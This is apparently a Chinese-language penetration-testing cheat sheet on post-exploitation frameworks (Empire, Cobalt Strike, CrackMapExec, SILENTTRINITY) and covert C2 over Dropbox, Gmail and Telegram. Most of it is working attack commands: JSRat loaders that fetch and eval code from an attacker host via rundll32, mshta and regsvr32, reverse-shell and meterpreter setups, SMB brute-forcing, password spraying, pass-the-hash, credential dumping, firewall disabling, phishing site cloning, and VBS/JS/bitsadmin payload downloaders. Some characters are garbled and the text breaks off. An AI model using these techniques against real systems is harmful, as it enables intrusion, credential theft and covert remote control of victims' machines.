| situational_awareness/network/get_exploitable_system | 查詢Active Directory以查找可能容易受到Metasploit Exploit的系統 |
| situational_awareness/network/get_spn | 獲取服務主體名稱(SPN) |
| situational_awareness/network/get_sql_instance_domain | 返回SQL Server實例列表 |
| situational_awareness/network/get_sql_server_info | 從目標SQL Server返回基本服務器和用戶信息 |
| situational_awareness/network/portscan | 使用常規套接字進行簡單的端口掃描 |
| situational_awareness/network/reverse_dns | 執行給定IPv4 IP范圍的DNS反向查找 |
| situational_awareness/network/smbautobrute | 針對用戶名/密碼列表運行SMB暴力破解 |
| situational_awareness/network/smbscanner | 在多臺機器上測試用戶名/密碼組合 |
| situational_awareness/network/powerview/find_foreign_group | 枚舉給定域的組的所有成員,并查找不在查詢域中的用戶 |
| situational_awareness/network/powerview/find_foreign_user | 枚舉在其主域之外的組中的用戶 |
| situational_awareness/network/powerview/find_gpo_computer_admin | 獲取計算機(或GPO)對象,并確定哪些用戶/組對該對象具有管理訪問權限 |
| situational_awareness/network/powerview/find_gpo_location | 獲取用戶名或組名,并確定其具有通過GPO進行管理訪問的計算機 |
| situational_awareness/network/powerview/find_localadmin_access | 在當前用戶具有“本地管理員”訪問權限的本地域上查找計算機 |
| situational_awareness/network/powerview/find_managed_security_group | 此功能檢索域中的所有安全組 |
| situational_awareness/network/powerview/get_cached_rdpconnection | 使用遠程注冊表功能來查詢計算機上“ Windows遠程桌面連接客戶端”的所有信息 |
| situational_awareness/network/powerview/get_computer | 查詢當前計算機對象的域 |
| situational_awareness/network/powerview/get_dfs_share | 返回給定域的所有容錯分布式文件系統的列表 |
| situational_awareness/network/powerview/get_domain_controller | 返回當前域或指定域的域控制器 |
| situational_awareness/network/powerview/get_domain_policy | 返回給定域或域控制器的默認域或DC策略 |
| situational_awareness/network/powerview/get_domain_trust | 返回當前域或指定域的所有域信任 |
| situational_awareness/network/powerview/get_fileserver | 返回從用戶主目錄提取的所有文件服務器的列表 |
| situational_awareness/network/powerview/get_forest | 返回有關給定域森林的信息 |
| situational_awareness/network/powerview/get_forest_domain | 返回給定林的所有域 |
| situational_awareness/network/powerview/get_gpo | 獲取域中所有當前GPO的列表 |
| situational_awareness/network/powerview/get_group | 獲取域中所有當前組的列表 |
| situational_awareness/network/powerview/get_group_member | 返回給定組的成員 |
| situational_awareness/network/powerview/get_localgroup | 返回本地或遠程計算機上指定本地組中所有當前用戶的列表 |
| situational_awareness/network/powerview/get_loggedon | 執行NetWkstaUserEnum Win32API調用以查詢主動登錄主機的用戶 |
| situational_awareness/network/powerview/get_object_acl | 返回與特定活動目錄對象關聯的ACL |
| situational_awareness/network/powerview/get_ou | 獲取域中所有當前OU的列表 |
| situational_awareness/network/powerview/get_rdp_session | 在給定的RDP遠程服務中查詢活動會話和原始IP |
| situational_awareness/network/powerview/get_session | 執行NetSessionEnum Win32API調用以查詢主機上的活動會話 |
| situational_awareness/network/powerview/get_site | 獲取域中所有當前站點的列表 |
| situational_awareness/network/powerview/get_subnet | 獲取域中所有當前子網的列表 |
| situational_awareness/network/powerview/get_user | 查詢給定用戶或指定域中用戶的信息 |
| situational_awareness/network/powerview/map_domain_trust | 使用.CSV輸出映射所有可訪問的域信任 |
| situational_awareness/network/powerview/process_hunter | 查詢遠程機器的進程列表 |
| situational_awareness/network/powerview/set_ad_object | 使用SID,名稱或SamAccountName來查詢指定的域對象 |
| situational_awareness/network/powerview/share_finder | 在域中的計算機上查找共享 |
| situational_awareness/network/powerview/user_hunter | 查找指定組的用戶登錄的機器 |
Trollsploit(惡作劇)
| 模塊名 | 功能 |
|---|
| trollsploit/get_schwifty | 播放Schwifty視頻,同時把計算機音量設置最大 |
| trollsploit/message | 發送一個消息框 |
| trollsploit/process_killer | 終止以特定名稱開頭的任何進程 |
| trollsploit/rick_ascii | 生成一個新的powershell.exe進程運行Lee Holmes' ASCII Rick Roll |
| trollsploit/rick_astley | 運行SadProcessor's beeping rickroll |
| trollsploit/thunderstruck | 播放Thunderstruck視頻,同時把計算機音量設置最大 |
| trollsploit/voicetroll | 通過目標上的合成語音朗讀文本 |
| trollsploit/wallpaper | 將.jpg圖片上傳到目標機器并將其設置為桌面壁紙 |
| trollsploit/wlmdr | 在任務欄中顯示氣球提示 |
Empire Word
>usestager windows/launcher_bat生成bat木馬,設置ListenerWord/Excel->插入->對象->由文件創建,選擇bat,顯示為圖標,修改圖標Macro>usestager windows/macro 設置ListenerWord/Excel->試圖->宏->創建,復制macro進去
Empire派生Cobalt Strike和MSF
派生MSF
可繞過殺軟Empire>usemodule code_execution/invoke_shellcode>set Lhost 192.168.0.1>set Lport 4444>set Payload reverse_httpMSF>use exploit/multi/handler>set payloadwindows/meterpreter/reverse_http>set Lhost 192.168.31.247>set lport 4444>run或Empire>usemodule code_execution/invoke_metasploitpayload>set URL http://SRVHOST:SRVPORTMSF#use exploit/multi/script/web_delivery#set payload windows/x64/meterpreter/reverse_tcp設置SRVHOST SRVPORT
派生Cobalt Strike
創建監聽器/windows/beacon_http/reverse_http 設置端口和主機Empire>usemodule code_execution/invoke_shellcode>set Lhost 192.168.0.1>set Lport 4444>set Payload reverse_http
Cobalt Strike
安裝
需要JDK環境>tar -xzvf jdk-8u191-linux-x64.tar.gz
部署TeamServer
>./teamserver 192.168.0.107 123456格式是外網IP和密碼
模塊
New Connection:新建連接Preferences:設置外觀Visualization:查看主機的不同形式VPN Interfaces: VPN接口Listeners:監聽器script Interfaces:查看和加載CNA腳本Close:關閉CS
連接
監聽器
創建Cobalt Strike -> Listeners點擊Add
Beacon為CS內部監聽器�����。Foreign一般與MSF結合使用���。系統架構的支持
攻擊模塊
| 名稱 | 功能 |
|---|
| HTML Application | 基于powershell的.hta格式的HTML Application木馬,分為可執行文件����、PowerShell�、VBA三種方法 |
| MS Office Macro | office宏病毒文件 |
| Payload Generator | 基于C���、C#��、COM Scriptlet����、Java����、Perl���、PowerShell����、Python�、Ruby�、VBA等語言的payload |
| USB/CD AutoPlay | 利用USB/CD自動播放運行的木馬 |
| Windows Dropper | 捆綁器 |
| Windows Executable | 生成32位或64位的exe和基于服務的可執行文件��、DLL等后門 |
| Windows Executable(S) | 生成可執行文件,支持powershell腳本,提供代理功能 |
Web Drive-by基于WEB的攻擊模塊
| 名稱 | 功能 |
|---|
| Manage | 管理開啟的模塊 |
| Clone Site | 克隆網站 |
| Host File | 提供文件下載 |
| Scripted Web Delivery | 基于Web的攻擊Payload |
| Signed Applet Attack | 運行java自簽名的攻擊模塊 |
| Smart Applet Attack | 自動檢測Java版本并利用已知的exploits攻擊 |
| System Profiler | 信息探測模塊 |
視圖模塊
| Applications | 顯示靶機應用信息 |
|---|
| Credentials | 顯示密碼(hashdump和mimikatz獲取的) |
| Downloads | 下載文件 |
| Event Log | 事件日志 |
| Keystrokes | 鍵盤記錄 |
| Proxy Pivots | 代理信息 |
| Screenshots | 屏幕截圖 |
| script Console | 加載腳本 |
| Targets | 查看目標 |
| Web Log | 查看web日志 |
創建powershell腳本
復制腳本到目標機執行即可上線.
交互
右鍵目標機Interact進入交互模式Access Dump hashes 獲取密碼Elevate 提權Golden Ticket 黃金票據注入會話Make token 制作令牌Run Mimikatz 運行mimikatzSpawn As 以靶機其他用戶權限生成會話Explore Browser Pivot 劫持瀏覽器Desktop(VNC) 遠程VNCFile Browser 文件管理Net View 執行命令net viewPort scan 端口掃描Process list 進程列表Screenshot 截圖Pivoting SOCKS Server 代理Listener 已獲權限的機器當作監聽器(反向端口轉發)Deploy VPN 部署VPNSpawn 派生會話:聯動MSF或Armitage 右鍵執行mimikatz即可獲取hash及明文密碼
視圖->憑證信息列出密碼,類似empire的creds命令
Beacon
argue 進程參數欺騙blockdlls 阻止子進程加載非Microsoft DLLbrowserpivot 注入受害者瀏覽器進程bypassuac 繞過UAC提升權限cancel 取消正在進行的下載cd 切換目錄checkin 強制讓被控端回連一次clear 清除beacon內部的任務隊列connect Connect to a Beacon peer over TCPcovertvpn 部署Covert VPN客戶端cp 復制文件dcsync 從DC中提取密碼哈希desktop 遠程桌面(VNC)dllinject 反射DLL注入進程dllload 使用LoadLibrary將DLL加載到進程中download 下載文件downloads 列出正在進行的文件下載drives 列出目標盤符elevate 使用expexecute 在目標上執行程序(無輸出)execute-assembly 在目標上內存中執行本地.NET程序exit 終止beacon會話getprivs Enable system privileges on current tokengetsystem 嘗試獲取SYSTEM權限getuid 獲取用戶IDhashdump 轉儲密碼哈希值help 幫助inject 在注入進程生成會話jobkill 結束一個后臺任務jobs 列出后臺任務kerberos_ccache_use 從ccache文件中導入票據應用于此會話kerberos_ticket_purge 清除當前會話的票據kerberos_ticket_use Apply 從ticket文件中導入票據應用于此會話keylogger 鍵盤記錄kill 結束進程link Connect to a Beacon peer over a named pipelogonpasswords 使用mimikatz轉儲憑據和哈希值ls 列出文件make_token 創建令牌以傳遞憑據mimikatz 運行mimikatzmkdir 創建一個目錄mode dns 使用DNS A作為通信通道(僅限DNS beacon)mode dns-txt 使用DNS TXT作為通信通道(僅限D beacon)mode dns6 使用DNS AAAA作為通信通道(僅限DNS beacon)mode http 使用HTTP作為通信通道mv 移動文件net net命令note 備注 portscan 進行端口掃描powerpick 通過Unmanaged PowerShell執行命令powershell 通過powershell.exe執行命令powershell-import 導入powershell腳本ppid Set parent PID for spawned post-ex jobsps 顯示進程列表psexec Use a service to spawn a session on a hostpsexec_psh Use PowerShell to spawn a session on a hostpsinject 在特定進程中執行PowerShell命令pth 使用Mimikatz進行傳遞哈希pwd 當前目錄位置reg Query the registryrev2self 恢復原始令牌rm 刪除文件或文件夾rportfwd 端口轉發run 在目標上執行程序(返回輸出)runas 以其他用戶權限執行程序runasadmin 在高權限下執行程序runu Execute a program under another PIDscreenshot 屏幕截圖setenv 設置環境變量shell 執行cmd命令shinject 將shellcode注入進程shspawn 啟動一個進程并將shellcode注入其中sleep 設置睡眠延遲時間socks 啟動SOCKS4代理socks stop 停止SOCKS4spawn Spawn a sessionspawnas Spawn a session as another userspawnto Set executable to spawn processes intospawnu Spawn a session under another PIDssh 使用ssh連接遠程主機ssh-key 使用密鑰連接遠程主機steal_token 從進程中竊取令牌timestomp 將一個文件的時間戳應用到另一個文件unlink Disconnect from parent Beaconupload 上傳文件wdigest 使用mimikatz轉儲明文憑據winrm 使用WinRM橫向滲透wmi 使用WMI橫向滲透執行命令,在beacon模式下鍵入shell+命令
>sleep 0 交互模式,立刻執行命令注入DLL到某個進程>dllload [pid] [c:\path\to\file.dll] DLL需在目標上>kerberos_ticket_purge 清除票據>kerberos_ccache_use [/path/to/file.ccache] 從ccache文件導入票據>kerberos_ticket_use [/path/to/file.ccache] 從ticket文件導入票據>kill pid 結束進程>timestomp [fileA] [fileB] 修改文件時間戳>getuid 獲取當前用戶>steal_token [pid] 竊取進程ID>rev2self 恢復原始令牌>powershell-import [/path/to/local/script.ps1] 導入PS模塊>shinject [pid] <x86|x64> [/path/to/my.bin] 向進程注入shellcode>socks port在指定端口開啟代理>socks stop停止代理>rportfwd [bind port] [forward host] [forward port]開啟端口轉發
克隆網站
Attacks -> Web Drive-by -> System ProfilerRedirect url設置為目標站,登錄成功會挑戰到真實網站釣魚攻擊->克隆網站克隆地址寫入要克隆的網站Attack選擇剛剛收集信息的網站Web日志界面可記錄鍵盤
攻擊->釣魚攻擊管理->web服務管理中,可kill掉剛剛的任務
office宏
釣魚郵件
新克隆一個網站
Embed URL選擇克隆好的網站
里面的超鏈接已經被Embed URL克隆好的URL替換掉了
若是要加載附件,需注意附件的免殺
加載腳本
https://github.com/rsmudge/ElevateKit 提權腳本>git clone https://github.com/rsmudge/ElevateKit.git>git clone https://github.com/TheKingOfDuck/myScripts.gitCobalt Strike -> Scripts 選擇elevate.cna加載提權的EXP列表就會增加已經加入的模塊
瀏覽器劫持
beacon 設為交互模式beacon> sleep 0[Beacon] → Explore → Browser Pivot選擇打對勾的注入,會返回一個proxy,服務器IP+端口>chromium --no-sandbox --ignore-certificate-errors --proxy-server=服務器IP:端口訪問網址
權限維持
https://github.com/DeEpinGh0st/Erebus加載 cna 腳本Cobalt Strike → script Manager → Load → Erebus 中的 Main.cna生成 PayloadAttacks → Packages→ Windows Executable(S)Erebus → Persistence選擇維持方法
橫向
掃描存活主機>portscan ip/網段 ports端口 掃描協議(arp�、icmp�、none) 線程>portscan 192.168.1.0/24 445 arp 100或右鍵目標>掃描點擊工具欄的View–>Targets,查看端口探測后的存活主機����。(Targets可自行添加)Login->psexec進行hash傳遞登錄
隔離網絡
權限機中轉
Pivoting ->Listener新建一條已有權限機器的監聽器
選擇 Attacks->Packages->Windows Executable(Stageless)
上傳生成的payload到已上線的目標機中,上傳PsExec.exebeacon>shell C:\psexec.exe -accepteula \\10.1.1.105 -u administrator -p xxx -d -c C:\beacon.exe
SMB_beacon
新建監聽器(bind)windows/beacon_smb/bind_pipe執行>psexec 機器名 ADMIN$/c$ bind
SSH login
>ssh 10.1.1.98:22 root admin
代理
>socks 690視圖->代理信息-tunnel 直接復制,粘貼到MSF中
部署VPN
選擇內網網卡
添加
刪除
Cobalt strike派生 Empire和MSF
派生Empire
創建一個Listener創建一個stager>usestager windows/shellcode 執行,會生成/tmp/launcher.binCS 使用PS命令查找進程,進行進程注入(>shinject 進程id x64),選擇launcher.bin即可
派生MSF
使用CS的外部監聽器windows/foreign/reverse_dns_txtwindows/foreign/reverse_httpwindows/foreign/reverse_httpswindows/foreign/reverse_tcpmsf開啟監聽cobalt strike會話主機上點擊spwan,創建外部監聽器,選擇windows/foreign/reverse_tcp指定MSF監聽的IP和端口即可
JSRat
https://github.com/Hood3dRob1n/JSRat-Pyhttps://github.com/Ridter/MyJSRat啟動>python JSRat.py -i 192.168.0.107 -p 1234MyJSRat可以-c參數指定執行的命令
/connect是回連地址,/wtf是執行代碼
直接在靶機執行
或>regsvr32.exe /u /n /s /i:http://192.168.0.107:1234/file.sct scrobj.dllJSRat顯示上線
Wsc方式
<?xml version="1.0"?><package><component ><script language="JScript"><![CDATA[ rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://192.168.0.107:1234/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}"; new ActiveXObject("WScript.Shell").Run(rat,0,true);]]></script></component></package>
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.0.107/jsrat.wsc")Mshta方式>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:1234/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
CrackMapExec
信息收集
返回活動主機>crackmapexec smb 192.168.0.0/24
爆破
支持協議ssh,smb,winrm,mssql,http爆破smb協議,兩臺機器,一個用戶名多個密碼>crackmapexec smb 192.168.0.98 192.168.0.55 -u username1 -p password1 password2>crackmapexec smb 192.168.0.0/24 -d zone.com -u y -p 'password' --shares
密碼噴射>crackmapexec <protocol> <target(s)> -u username1 username2 -p password1指定字典>crackmapexec <protocol> <target(s)> -u /tmp/user.txt -p /tmp/pass.txtHash爆破>crackmapexec <protocol> <target(s)> -u /tmp/user.txt -H /tmp/ntlm.txt
可用模塊
日志的保存位置~/.cme/logs查看協議可用后續模塊>crackmapexec smb -L
常用的模塊Get-ComputerDetails獲取計算機信息Bloodhound 執行一個BloodHound腳本獲取信息empire_exec 與empire交互enum_avproducts 列舉AV產品enum_chrome 獲取目標chrome中保存的密碼get_keystrokes 鍵盤記錄get_netdomaincontroller 列出所有域控制器get_netrdpsession 列出活動的RDP會話gpp_autologin 從域控中registry.xml查找自動登錄的賬戶密碼gpp_password 組策略憑據中返回GPP密碼invoke_sessiongopher 保存putty,winscp,filezilla,superputty rdp的sessioninvoke_vnc 注入一個vnc客戶端到內存met_inject 與msf交互mimikatz 調用mimikatz模塊mimikatz_enum_chrome 使用mimikatz解密chrome保存的密碼mimikatz_enum_vault_creds 解密windows憑據管理器中保存的密碼mimikittenz 執行咪咪貓(windows密碼獲取軟件)multirdp 允許多用戶登錄RDPnetripper 通過API hooking截取平常pe_inject DLL/EXE注入rdp 開啟或關閉RDPshellcode_inject 注入shellcodetokens 列舉可用tokenuac 查看UAC是否開啟wdigest 開啟或關閉wdigestweb_delivery 執行exploit/multi/script/web_delivery模塊查看模塊的選項>crackmapexec smb -M module --options
使用方式>crackmapexec smb <target(s)> -u user -p 'P@ssw0rd' -M module -o 參數=值
PTH
>crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH>crackmapexec smb <target(s)> -u username -H NTHASH
執行命令
>crackmapexec smb 192.168.0.98 -u y -p 'qwe12323' -x 'command'
-X執行powershell命令>crackmapexec smb 192.168.0.98 -u y -p 'qwe12323' -X 'POWESHELL'
koadic
https://github.com/zerosum0x0/koadic>git clone https://github.com/zerosum0x0/koadic.git>cd koadic>pip3 install -r requirements.txt>./koadic
SILENTTRINITY
https://github.com/byt3bl33d3r/SILENTTRINITY類似cobalt strike+empire的結合>git clone https://github.com/byt3bl33d3r/SILENTTRINITY>pip3 install --user pipenv && pipenv install && pipenv shell>python st.py服務端執行>python3 st.py teamserver <teamserver_ip> <teamserver_password>>python3 st.py teamserver 192.168.0.108 123456也可加參數--port指定端口
客戶端執行>python3 st.py client wss://<username>:<teamserver_password>@<teamserver_ip>:5000>python3 st.py client wss://y:123456@192.168.0.108:5000
>listeners命令進入監聽器目錄>use http選擇監聽器>options命令查看需要配置的參數
>set Port 8081 使用set命令配置參數>start 啟動監聽器>list查看運行中的監聽器
>stop http使用stop+監聽器名字停止監聽器>stagers進入payload目錄>list列出可用payload
>use payloadname 命令use+payload名字>generate http generate+監聽器名字生成payload
Browser C2
360全套+火絨沒有攔截缺點:會有黑框,并且打開chrome瀏覽器,功能限制https://github.com/0x09AL/Browser-C2>go get -u github.com/gorilla/mux>go get -u github.com/chzyer/readline>git clone https://github.com/0x09AL/Browser-C2.git/Browser-C2/agent/agent.go修改C2地址
修改chrome的位置
編譯客戶端>CGO_ENABLED=1 GOARCH= GOOS=windows go build
/Browser-C2/static/jquery.js修改控制服務器IP
轉到主目錄編譯服務器端>go build靶機執行生成好的客戶端攻擊機監聽
此框架與靶機之間通信未加密,功能有限,可與msf����、cs����、poshc2��、empire等框架建立聯系��。
DropBox C2
>git clone https://github.com/Arno0x/DBC2 dbc2>cd dbc2>pip install -r requirements.txt>chmod +x dropboxC2.pyhttps://www.dropbox.com/developers/apps/create創建好后要生成個accesstoken,填入config.py中
執行
這里需設置一個與受控機交互的加密密碼發布agent>publishStage dbc2_agent.exe使用命令listPublishedStage可以看到已發布的agent
生成payload>genStager [tab]查看可生成的格式
>genStager oneliner default生成powershell格式payload
>genStager batch default生成bat格式
Msbuild,其余不做演示
這里使用powershell格式的,在受控機運行
攻擊機可以看到上線
>list命令可以看到已控機器
使用use命令與受控機器交互
輸入?獲得后續命令
Gmail C2
Gcat
https://myaccount.google.com/lesssecureapps啟用設置
Gmail啟用imap
將以下腳本轉換為exe# setup.pyfrom distutils.core import setupimport py2exesetup(console=['implant.py'])https://github.com/byt3bl33d3r/gcat把gcat項目中的implant.py跟以上腳本放在同一目錄,修改implant.py中的賬戶信息
>python 1.py py2exe打包dist目錄下生成implant.exe受控機執行同時也要修改項目中gcat.py中的賬戶信息
在受控機執行implant.exe,如果報錯修改email模塊以下三行from email.mime.multipart import MIMEMultipartfrom email.mime.base import MIMEBasefrom email.mime.text import MIMEText
執行后,郵箱會收到信息
使用gcat.py也可以得到當前會話>python gcat.py -list
現在可對其進行控制>python gcat.py -id [id] -cmd 'net user'
生成jobid,指定jobid可查看回顯
郵箱中也存在
當受控機為中文系統時,回顯會報錯,修改代碼
其他模塊有回顯的直接修改后重新py2exe打包即可����。支持的功能:cmd,upload/download,執行shellcode,鍵盤記錄,截屏等
Gdog
https://github.com/maldevel/gdog功能更多:加密傳輸����、地理位置�����、執行命令��、上傳下載����、shellcode���、截圖�����、鍵盤記錄���、關閉重啟���、注銷用戶����、從web下載����、訪問網站等配置流程基本一樣,需要打包exe,但是要安裝一些模塊PyCrypto�、WMI�����、Enum34����、Netifaces# setup.pyfrom distutils.core import setupimport py2exesetup(console=['client.py'])client.py在回顯處也要添加decode gbk執行client.exe報超出索引錯誤時在client.py中搜索字符串for iface in netifaces.interfaces():在它下面一行修改為if netifaces.ifaddresses(iface)[netifaces.AF_LINK][0]['addr'] == self.MAC and netifaces.AF_INET in netifaces.ifaddresses(iface):打包好后執行
提取jobid回顯出錯的話,添加reload(sys)sys.setdefaultencoding("utf-8")執行shellcode>msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python去除引號加減號,只保留shellcode粘貼到文件shell.txt>python gdog.py -id {id} -exec-shellcode /tmp/shell.txt
Telegram C2
登錄telegram訪問https://telegram.me/botfather,發送消息
創建一個bot
創建完成后返回一個token>pip install telepot>pip install requests>git clone https://github.com/blazeinfosec/bt2.git編輯bt2.py粘貼token和chatid進腳本Chat_id的獲取方式https://api.telegram.org/bot<token>/getUpdates
當有受控機上線時會列出功能
Windowshttps://github.com/sf197/Telegra_Csharp_C2
信息收集
Cmd
>whoami /user 查看當前用戶SID>net config Workstation 查看當前計算機信息>net time /domain 判斷主域錯誤5:存在域,當前不是域用戶顯示時間:存在域,當前是域內用戶找不到域:不存在>net view /domain 列出域列表>net group "Domain Controllers" /domain查看主域控>nltest /DCLIST:zone.com 查看域控>net group "domain admins" /domain 查看域管理員>net group "enterprise admins" /domain 查看企業管理員列表>net localgroup administrators /domain 查看管理組用戶>net group "domain computers" /domain 查看域成員計算機>net accounts /domain 查看密碼策略>net user /domain查看域內用戶>net view /domain:dc 查詢域內計算機>netsh firewall set opmode disable/enable 關閉windows防火墻(win2003)>netsh advfirewall set allprofiles state off/on(大于win2003)>arp -a查看arp表>net start 查看服務>route print查看路由表>query user查看登錄機器的用戶的連接狀態>tasklist /v 查看域管理員進程>dsquery server查詢域控制器>dsquery computer 查詢域內機器>dsquery user 查詢域用戶>dsquery ou 域內組織單位導出域DNS記錄,文件保存在C:\Windows\System32\dns\>dnscmd /zoneexport zone.com 1.txt導出LDAP數據庫>LDIFDE -f c:\windows\temp\dump.ldf -n -m
Wmi
>wmic OS get Caption,CSDVersion,OSArchitecture,Version系統版本>wmic service list brief 列出本機服務>wmic process list brief 列出進程>wmic process where name="chrome.exe" get executablepath進程路徑>wmic process get caption,commandline /value>>1.txt查詢所有進程參數>wmic process where caption="svchost.exe" get caption,commandline /value 查詢某個進程命令行參數創建進程>wmic process call create calc>wmic process call create "C:\shell.exe">wmic process call create "shutdown.exe -r -f -t 20"結束進程>wmic process where name="shell.exe" call terminate>wmic process where process delete>wmic process 2345 call terminate>wmic startup list brief 列出自啟動程序>wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List 查看殺毒軟件>wmic netuse list brief 列出共享驅動盤>wmic ntdomain list brief 查詢域控制器>wmic useraccount list brief 列出本機管理員及SID>wmic qfe list brief 列出補丁列表>wmic share get name,path 查看共享>wmic startup list brief查看啟動項>wmic product get name,version 查看安裝的軟件>wmic product where "name like '%360%'" get name 查看程序名>wmic product where name="360tray" call uninstall 卸載程序>wmic process where "name like '%360%'" get name 查找進程全名>wmic product where name="360tray.exe" call terminate 停止程序>wmic desktop get screensaversecure,screensavertimeout 查看屏保
PowerView
獲取域信息>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Get-NetDomain}"
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; get-netforest}"
枚舉管理員>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-EnumerateLocalAdmin}"
查詢管理在線的機器>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-userhunter}"
查看域內機器以administrator權限運行的進程>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-processhunter }"
或指定參數userfile和computerfile查詢某臺機器某個用戶的進程>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-processhunter -Userfile .\user.txt -computerfile .\host.txt}"
查詢域內機器共享>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-sharefinder}"
查詢域內機器>Get-NetComputer -Domain zone.com
>Find-LocalAdminAccess -verbose 查詢域內本地用戶能登錄的機器
Dev-powerview獲取域控機器和win版本>Get-DomainController |select name,osversion|fl
Linux
操作系統&內核版本&環境變量>cat /etc/issue>cat /etc/*-release>cat /etc/lsb-release>cat /etc/redhat-releasecat /proc/version>uname -a>uname -mrs>rpm -q kernel>dmesg | grep Linux>ls /boot | grep vmlinuz->cat /etc/profile>cat /etc/bashrc>cat ~/.bash_profile>cat ~/.bashrc>cat ~/.bash_logout>env>setRoot權限進程>ps aux | grep root>ps -ef | grep root計劃任務>crontab -l>ls -alh /var/spool/cron>ls -al /etc/ | grep cron>ls -al /etc/cron*>cat /etc/cron*>cat /etc/at.allow>cat /etc/at.deny>cat /etc/cron.allow>cat /etc/cron.deny>cat /etc/crontab>cat /etc/anacrontab>cat /var/spool/cron/crontabs/rootIP信息>/sbin/ifconfig -a>cat /etc/network/interfaces>cat /etc/sysconfig/network連接信息>grep 80 /etc/services>netstat -antup>netstat -antpx>netstat -tulpn>chkconfig --list>chkconfig --list | grep 3:on>last>w用戶信息>id>whomi>w>last>cat /etc/passwd>cat /etc/group>cat /etc/shadow>ls -alh /var/mail/>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # 列出超級用戶>awk -F: '($3 == "0") {print}' /etc/passwd #列出超級用戶>cat /etc/sudoers>sudo –l操作記錄>cat ~/.bash_history>cat ~/.nano_history>cat ~/.atftp_history>cat ~/.mysql_history>cat ~/.php_history可寫目錄>find / -writable -type d 2>/dev/null # 可寫目錄>find / -perm -222 -type d 2>/dev/null # 可寫目錄>find / -perm -o w -type d 2>/dev/null # 可寫目錄>find / -perm -o x -type d 2>/dev/null # 可執行目錄>find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # 可寫可執行目錄
HTTP服務
>python2 -m SimpleHTTPServer>python3 -m http.server 8080>php -S 0.0.0.0:8888>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes>openssl s_server -key key.pem -cert cert.pem -accept 443 –WWW>ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,:DocumentRoot => Dir.pwd).start">ruby -run -e httpd . -p 8888
文件操作
Windows查找文件
>cd /d E: && dir /b /s index.php>for /r E:\ %i in (index*.php) do @echo %i>powershell Get-ChildItem d:\ -Include index.php -recurse
Linux查找文件
#find / -name index.php查找木馬文件>find . -name '*.php' | xargs grep -n 'eval('>find . -name '*.php' | xargs grep -n 'assert('>find . -name '*.php' | xargs grep -n 'system('
創建
讀文本文件:>file = Get-Content "1.txt">file>powershell Set-content "1.txt" "wocao"&>powershell "write-output ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"d2Vic2hlbGw=\"))) | out-file -filepath c:\www\wwwroot\1.aspx;"
壓縮
>rar.exe a –k –r –s –m3 C:\1.rar C:\wwwroot>7z.exe a –r –p12345 C:\1.7z C:\wwwroot
解壓
>rar.exe e c:\wwwroot\1.rar>7z.exe x –p12345 C:\1.7z –oC:\wwwroot
傳輸
FTP
>open 192.168.0.98 21>輸入賬號密碼>dir查看文件>get file.txt
VBS
#1.vbs
Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://192.168.1.192/Client.exe",0Post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()aGet.Write(Post.responseBody)aGet.SaveToFile "C:\1.exe",2>cscript 1.vbsConst adTypeBinary = 1Const adSaveCreateOverWrite = 2Dim http,adoSet http = CreateObject("Msxml2.serverXMLHTTP")http.SetOption 2,13056//忽略HTTPS錯誤http.open "GET","http://192.168.1.192/Client.exe",Falsehttp.sendSet ado = createobject("Adodb.Stream")ado.Type = adTypeBinaryado.Openado.Write http.responseBodyado.SaveToFile "c:\1.exe"ado.Close
JS
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type = 1; BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("1.exe");
>cscript /nologo 1.js http://192.168.1.192/Client.exe
Bitsadmin
>bitsadmin /transfer n http://192.168.1.192/Client.exe e:\1.exe>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe "
Powershell
1
